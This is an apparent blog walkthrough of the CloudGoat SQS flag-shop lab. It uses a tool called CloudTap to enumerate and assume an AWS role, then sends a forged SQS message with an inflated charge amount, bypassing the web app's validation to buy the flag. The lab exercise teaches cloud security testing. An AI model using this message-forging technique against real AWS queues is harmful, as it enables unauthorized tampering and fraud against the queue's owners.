Cloudgoat-SQS_Flag_Shop

,

CloudGoat SQS Lambda Privesc Walkthrough

This comprehensive CloudGoat walkthrough demonstrates how to exploit SQS (Simple Queue Service) vulnerabilities to achieve privilege escalation in AWS environments. We’ll use CloudTap, an advanced AWS security testing tool, to automate enumeration and role assumption for efficient penetration testing.

Initial Setup and Configuration

First, whitelist your IP address to ensure proper access to CloudGoat resources:

1
cloudgoat config whitelist --auto

Create the lambda_privesc scenario:

1
cloudgoat create lambda_privesc

The setup provides initial credentials and target information:

1
2
3
cloudgoat_output_sqsuser_access_key_id = AKIAQ6VKGD5Y2RVBYOH6
cloudgoat_output_sqsuser_secret_key = [REDACTED]
web_site_ip = http://35.153.201.178:5000

Target Analysis

Accessing the web application reveals a shopping website with a coin-based payment system:

Web Application Interface

The application allows users to charge their account with coins through a POST request to /charge_cash/10. Analysis of the network traffic shows the charging mechanism uses specific amounts (1, 5, or 10 coins) with a 20-second delay.

Enumeration with CloudTap

CloudTap is an innovative AWS security assessment tool that streamlines the enumeration process by automatically discovering permissions, roles, and potential attack vectors. Unlike manual enumeration, CloudTap provides comprehensive visibility into AWS environments with automated role assumption capabilities.

Run CloudTap with the following command:

1
python3 CloudTap.py

Using CloudTap for initial reconnaissance reveals:

  • Role: cg-sqs-send-message-cgidax1f0hnq4i
  • Permissions: sqs:GetQueueUrl and sqs:SendMessage
  • Automatic role assumption capability detected

CloudTap Role Assumption

CloudTap’s automated approach significantly reduces manual testing time while ensuring comprehensive coverage of AWS attack surfaces.

Verify the assumed role identity:

1
aws sts get-caller-identity --profile init
1
2
3
4
5
{
    "UserId": "AROAQ6VKGD5YVZOGE6GS6:SecurityTest-cg-sqs-user-cgidax1f0hnq4i-cg-sqs-send-message-",
    "Account": "065855168369",
    "Arn": "arn:aws:sts::065855168369:assumed-role/cg-sqs-send-message-cgidax1f0hnq4i/SecurityTest-cg-sqs-user-cgidax1f0hnq4i-cg-sqs-send-message-"
}

SQS Queue Discovery

Retrieve the SQS queue URL using the discovered queue name:

1
aws sqs get-queue-url --queue-name cash_charging_queue --profile init
1
2
3
{
    "QueueUrl": "https://sqs.us-east-1.amazonaws.com/065855168369/cash_charging_queue"
}

Vulnerability Analysis

Examining the application’s source code reveals the charge_cash function logic:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
<!-- 
@app.route('/charge_cash/<cash>', methods=['POST'])
def charge_cash(cash):
    cash = int(cash)
    if cash==1 or cash==5 or cash==10:
        msg = {"charge_amount" : cash}
        message_body = json.dumps(msg)
        response = sqs.sqs_client.send_message(
          QueueUrl=sqs.sqs_queue_url, 
          MessageBody=message_body
        )
        time.sleep(10)
        return redirect(url_for('index'))
    else:
        return "BAD Request!!"
-->

The vulnerability lies in the ability to directly send messages to the SQS queue, bypassing the web application’s input validation.

Exploitation

Craft a malicious SQS message with an inflated charge amount:

1
aws sqs send-message --queue-url https://sqs.us-east-1.amazonaws.com/065855168369/cash_charging_queue --message-body '{"charge_amount": 100000000}' --profile init

After sending the message, refresh the web application to see the inflated coin balance, then purchase the flag:

Flag Retrieved

Key Takeaways

This CloudGoat walkthrough demonstrates critical SQS security considerations:

  • Direct queue access can bypass application-level controls
  • Message validation should occur at both application and queue levels
  • Principle of least privilege must be applied to SQS permissions
  • CloudTap’s automated enumeration significantly accelerates security assessments